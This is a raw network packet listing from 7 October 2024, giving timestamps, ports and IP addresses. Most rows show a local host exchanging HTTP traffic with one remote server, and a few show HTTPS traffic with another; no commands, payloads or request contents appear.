Oct 7, 2024 03:15:43.719944000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719957113 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.719978094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.719993114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720012903 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720026970 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720046997 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720061064 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720081091 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720096111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720113993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720129013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720149040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720174074 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720181942 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720195055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720216990 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720251083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720268011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720284939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720299959 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720319033 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720333099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720352888 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720366955 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720386982 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720398903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720423937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720436096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720457077 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720473051 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720491886 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720504999 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720525026 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720540047 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720560074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720575094 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720593929 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720609903 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720628977 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720643044 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720662117 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720674038 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720695972 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720730066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720745087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720762968 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720793962 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720796108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720814943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720829964 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720921040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720942974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720954895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.720976114 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.720988989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721007109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721023083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721060038 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721079111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721095085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721105099 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721128941 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721144915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721162081 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721178055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721196890 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721210003 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721231937 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721251011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721266985 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721301079 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721314907 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721333981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721349001 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721374989 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721391916 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721409082 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721425056 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721442938 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721477032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721493006 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721510887 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721527100 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721544981 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721561909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721580029 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721612930 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721627951 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721649885 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721657991 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721683025 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721698046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721718073 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721729994 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721750021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721761942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721785069 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721797943 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721818924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721834898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721853018 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721867085 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721885920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721900940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721920013 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721940041 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721954107 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.721965075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.721990108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.722007990 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.722018957 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.722069025 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.781153917 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.784691095 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.784709930 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.785226107 CEST	49857	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.785231113 CEST	443	49857	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.798962116 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.804851055 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.804864883 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.805329084 CEST	49858	443	192.168.2.5	13.107.246.45
Oct 7, 2024 03:15:43.805334091 CEST	443	49858	13.107.246.45	192.168.2.5
Oct 7, 2024 03:15:43.808896065 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.808995962 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809083939 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809118986 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809159040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809174061 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809205055 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809231043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809232950 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809292078 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809344053 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809346914 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809386969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809396982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809437037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809438944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809489965 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809494019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809529066 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809545040 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809562922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809578896 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809600115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809612036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809634924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809649944 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809669971 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809683084 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809705019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809719086 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809752941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809756994 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809803963 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809809923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809848070 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809861898 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809881926 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809895039 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809916019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.809926987 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809963942 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.809968948 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810018063 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810020924 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810053110 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810067892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810101032 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810107946 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810154915 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810159922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810194969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810208082 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810245037 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810246944 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810296059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810302019 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810336113 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810352087 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810370922 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810383081 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810422897 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810429096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810462952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810475111 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810496092 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810507059 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810538054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810549021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810583115 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810595036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810616016 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810626030 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810648918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810658932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810692072 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810703039 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810736895 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810746908 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810770988 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810781002 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810815096 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810825109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810858965 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810869932 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810900927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810914993 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.810959101 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.810966969 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811001062 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811017036 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811034918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811050892 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811069012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811083078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811104059 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811116934 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811140060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811156988 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811175108 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811186075 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811211109 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811224937 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811245918 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811264992 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811280966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811290026 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811315060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811325073 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811347961 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811364889 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811382055 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811450958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811455011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811455011 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811485052 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811505079 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811518908 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811532974 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811556101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811564922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811589003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811604977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811623096 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811636925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811656952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811677933 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811697960 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811708927 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811731100 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811739922 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811764956 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811781883 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811803102 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811813116 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811836958 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811846972 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811870098 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811881065 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811903954 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811913967 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811937094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811954021 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.811983109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.811986923 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812016964 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812020063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812040091 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812053919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812066078 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812089920 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812104940 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812123060 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812139034 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812156916 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812165976 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812191963 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812210083 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812226057 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812263012 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812273979 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812297106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812311888 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812330008 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812345982 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812364101 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812376022 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812397003 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812412977 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812431097 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812444925 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812464952 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812479973 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812500000 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812511921 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812534094 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812545061 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812567949 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812580109 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812599897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812612057 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812634945 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812648058 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812668085 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812685013 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812705040 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812719107 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812740088 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812748909 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812774897 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812783957 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812807083 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812817097 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812841892 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812851906 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812875032 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812885046 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812907934 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812926054 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812941074 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.812957048 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.812988043 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.813003063 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.813036919 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.813051939 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.813071966 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.813086033 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.813105106 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.813123941 CEST	49782	80	192.168.2.5	95.164.90.97
Oct 7, 2024 03:15:43.813139915 CEST	80	49782	95.164.90.97	192.168.2.5
Oct 7, 2024 03:15:43.813150883 CEST	49782	80	192.168.2.5	95.164.90.97
